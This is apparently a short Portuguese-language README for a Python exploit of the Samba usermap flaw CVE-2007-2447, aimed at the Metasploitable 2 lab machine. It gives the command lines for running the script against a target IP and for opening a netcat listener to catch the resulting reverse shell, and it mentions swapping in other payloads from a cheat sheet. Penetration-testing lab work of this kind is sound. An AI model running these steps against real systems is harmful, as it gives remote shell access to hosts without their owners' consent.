
Script de exploração em Python para CVE-2007-2447 (Samba usermap) que entrega um reverse shell com payloads personalizáveis, projetado para testes de penetração em alvos vulneráveis como Metasploitable 2.
Para testar o script, recomendo a máquina virtual "metasploitable 2" disponível aqui. O script exibirá um reverse shell se o exploit funcionar. Para obter a conexão, basta abrir uma sessão netcat como:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
e no meu netcat :
netcat -lnvp 1337
Resultado:
netcat :
alt text
e no script:
alt text
Usei um payload de uma cheat-sheet. O link está disponível aqui. Você pode substituí-lo por outros payloads.